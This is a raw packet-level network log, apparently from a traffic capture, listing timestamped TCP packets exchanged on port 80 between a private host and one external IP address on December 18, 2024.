                                                                    Dec 18, 2024 09:19:20.556629896 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.557451963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.557504892 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.557621956 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.558481932 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.558494091 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.558526993 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.559247017 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.559367895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.559416056 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.559933901 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.559993982 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.560120106 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.560765982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.560839891 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.560908079 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.561821938 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.561903000 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.561930895 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.562750101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.562788963 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.562947035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.563741922 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.563790083 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.563930988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.564754963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.564769983 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.564805984 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.565700054 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.565754890 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.565789938 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.566715956 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.566756010 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.566829920 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.567732096 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.567770958 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.567771912 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.568633080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.568747044 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.568762064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.569623947 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.569679976 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.569724083 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.570632935 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.570677042 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.570780039 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.571615934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.571651936 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.571697950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.572693110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.572737932 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.699189901 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.699249983 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.699306965 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.699687958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.699771881 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.699831963 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.700606108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.700690985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.700730085 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.701545954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.701651096 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.701730013 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.702569008 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.702630043 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.702682018 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.703620911 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.703808069 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.703874111 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.704597950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.704633951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.704678059 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.705410004 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.705435038 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.705475092 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.706321955 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.706361055 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.706418991 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.707067013 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.707134962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.707175970 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.722605944 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.722644091 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.722687006 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.722832918 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.722910881 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.722979069 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.723449945 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.723495007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.723582983 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.724288940 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.724378109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.724446058 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.725301027 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.725380898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.725465059 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.726231098 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.726331949 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.726380110 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.727253914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.727344990 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.727394104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.728323936 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.728446007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.728488922 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.729191065 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.729314089 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.729379892 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.730230093 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.730364084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.730405092 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.731190920 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.731270075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.731303930 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.732182026 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.732306004 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.732357025 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.733195066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.733285904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.733392954 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.734113932 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.734230042 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.734262943 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.735084057 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.735196114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.735229015 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.736076117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.736191034 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.736263037 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.737056971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.737183094 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.737236977 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.738167048 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.738238096 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.738272905 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.739291906 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.739500046 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.739600897 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.740072012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.740214109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.740247965 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.741043091 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.741238117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.741292000 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.742014885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.742109060 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.742141008 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.743021011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.743108988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.743164062 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.743967056 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.744163036 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.744205952 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.744945049 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.745065928 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.745111942 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.745975018 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.746000051 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.746035099 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.746901035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.747014999 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.747087955 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.747876883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.747982979 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.748030901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.748881102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.748914003 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.748950958 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.749877930 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.749948978 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.750099897 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.750854969 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.750967026 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.751028061 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.751835108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.751974106 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.752031088 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.752830029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.752876997 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.752912998 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.753922939 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.753969908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.754010916 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.754789114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.754903078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.754976034 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.755773067 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.755892992 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.755978107 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.756762028 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.756870031 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.756911039 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.757741928 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.757904053 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.757960081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.758908987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.758986950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759027004 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.759737968 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759823084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759872913 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.760713100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.760837078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.760881901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.761678934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.811101913 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.910039902 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.751310110 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.870908022 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:21.871011972 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.871556997 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.991034031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377403021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377449036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377479076 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377518892 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377552032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377558947 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377588034 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377636909 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377636909 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377661943 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377716064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377752066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377787113 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377791882 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377827883 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.497618914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.497756004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.497931004 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.501601934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600240946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600256920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600539923 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.600712061 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600725889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600923061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.604757071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.604880095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.604926109 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.613162994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.613229036 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.613239050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.621552944 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.621566057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.622437954 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.629883051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.630009890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.630032063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.638308048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.638320923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.638513088 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.646676064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.646759033 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.646789074 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.655036926 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.655102968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.655133009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663403988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663542986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663568974 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.720083952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.720135927 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.720231056 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.795737028 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.806293011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.806359053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.806482077 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.809179068 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.809271097 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.809324026 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.815140009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.815186024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.815331936 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.820827961 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.820899010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.821861029 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.826836109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.827069998 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.827550888 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.832420111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.832442045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.832688093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.838383913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.838476896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.838679075 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.844026089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.844192028 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.844326019 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.849884033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.849963903 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.850289106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.855704069 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.855825901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.856081963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.860419989 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.860490084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.860754967 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.865109921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.865192890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.865391970 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.869816065 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.870019913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.870090008 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.874552011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.874803066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.874887943 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.879220009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.879338026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.879462957 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.884274006 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997313976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997328043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.997433901 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.999100924 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.999252081 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.999272108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.002943039 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.003113985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.020467997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.020513058 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.020608902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.021493912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.021646976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.021776915 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.025101900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.025192976 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.025551081 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.027945995 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.027970076 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.028008938 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.031510115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.031522989 CET8049738139.99.188.124192.168.2.6
